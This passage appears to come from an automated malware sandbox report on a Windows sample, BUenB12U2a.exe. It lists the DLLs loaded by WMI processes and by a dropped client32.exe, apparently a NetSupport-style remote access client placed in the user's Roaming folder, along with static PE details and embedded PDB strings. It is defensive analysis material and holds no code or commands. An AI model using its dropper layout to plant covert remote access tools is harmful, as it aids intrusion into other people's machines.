                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcicl32.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: shfolder.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcichek.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcicapi.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: msvcr100.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wtsapi32.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: nsmtrace.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: devobj.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: msasn1.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{75048700-EF1F-11D0-9888-006097DEACF9}\InProcServer32Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile written: C:\Users\user\AppData\Roaming\extracted\client32.iniJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                Source: BUenB12U2a.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                Source: BUenB12U2a.exeStatic file information: File size 33884861 > 1048576
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeFile opened: C:\Users\user\AppData\Roaming\extracted\MSVCR100.dllJump to behavior
                                Source: BUenB12U2a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: BUenB12U2a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: BUenB12U2a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: BUenB12U2a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: BUenB12U2a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: BUenB12U2a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: BUenB12U2a.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: BUenB12U2a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716385209.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713321376.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: m\1200\1200\ctl32\release\pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1799122999.000002101120B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799328127.00000210111CC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799122999.0000021011130000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799122999.00000210111CB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ucrtbase.pdb source: BUenB12U2a.exe, 00000001.00000002.1971040442.00007FFE01428000.00000002.00000001.01000000.00000004.sdmp
                                Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1712987011.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715337207.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715953298.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713884666.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716027866.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713533133.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-kernel32-legacy-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713680258.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715858737.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: BUenB12U2a.exe, 00000001.00000002.1973327452.00007FFE13310000.00000002.00000001.01000000.00000008.sdmp
                                Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715953298.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714111041.0000021D68869000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716606223.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1712853031.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714026120.0000021D6886A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715513195.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1972151598.00007FFE126EC000.00000002.00000001.01000000.0000000B.sdmp
                                Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
                                Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714286119.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1713191627.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713191627.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713264817.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715858737.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713390708.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716606223.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713122564.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713469829.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdbm\1200\1200\ctl32\release\pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1799122999.000002101120B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799122999.0000021011130000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\Full\pcichek.pdb source: BUenB12U2a.exe, 00000001.00000003.1800970683.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1800179941.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1800730653.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1801612970.00000210111C7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715337207.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714619958.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ucrtbase.pdbOGPS source: BUenB12U2a.exe, 00000001.00000002.1971040442.00007FFE01428000.00000002.00000001.01000000.00000004.sdmp
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714026120.0000021D6886A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\tcctl32.pdb source: BUenB12U2a.exe, 00000001.00000003.1803194949.00000210118E1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1802845516.00000210111C8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: BUenB12U2a.exe, 00000000.00000003.1711310620.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1973727085.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713821207.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714452192.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716529790.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1714204693.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1712987011.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713747367.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713821207.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713960779.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: BUenB12U2a.exe, 00000001.00000002.1972917021.00007FFE13203000.00000002.00000001.01000000.0000000D.sdmp
                                Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714373322.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1712853031.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716303770.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716684625.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714537738.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713600901.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714373322.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\libssl-3.pdb source: BUenB12U2a.exe, 00000001.00000002.1970527009.00007FFE007E4000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716027866.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716529790.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: BUenB12U2a.exe, 00000001.00000002.1971670119.00007FFE11EAD000.00000002.00000001.01000000.0000000E.sdmp
                                Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716134858.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713884666.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716456872.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: BUenB12U2a.exe, 00000001.00000003.1796297980.0000021011134000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796297980.00000210111C7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: BUenB12U2a.exe, 00000001.00000002.1966827641.00007FFDFB179000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1711310620.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1973727085.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715602426.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714537738.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713533133.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msvcr100.i386.pdb source: BUenB12U2a.exe, 00000001.00000003.1797924656.0000021011988000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1797924656.00000210118E1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1798504683.0000021011988000.00000004.00000020.00020000.00000000.sdmp, client32.exe
                                Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716224988.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713469829.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715430142.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: BUenB12U2a.exe, 00000000.00000003.1712366754.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1971483273.00007FFE11517000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713056195.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714111041.0000021D68869000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713122564.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713264817.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714619958.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715779957.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716303770.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715602426.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1712921749.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: BUenB12U2a.exe, 00000000.00000003.1711435934.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1973122343.00007FFE1321D000.00000002.00000001.01000000.0000000A.sdmp
                                Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713056195.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\htctl32.pdb source: BUenB12U2a.exe, 00000001.00000003.1798201497.00000210111CB000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1797337365.00000210111CB000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1797646830.00000210111CC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1797337365.0000021011130000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1798361127.00000210111CC000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: BUenB12U2a.exe, 00000000.00000003.1712637069.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1971951478.00007FFE11ED8000.00000002.00000001.01000000.0000000C.sdmp
                                Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715779957.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
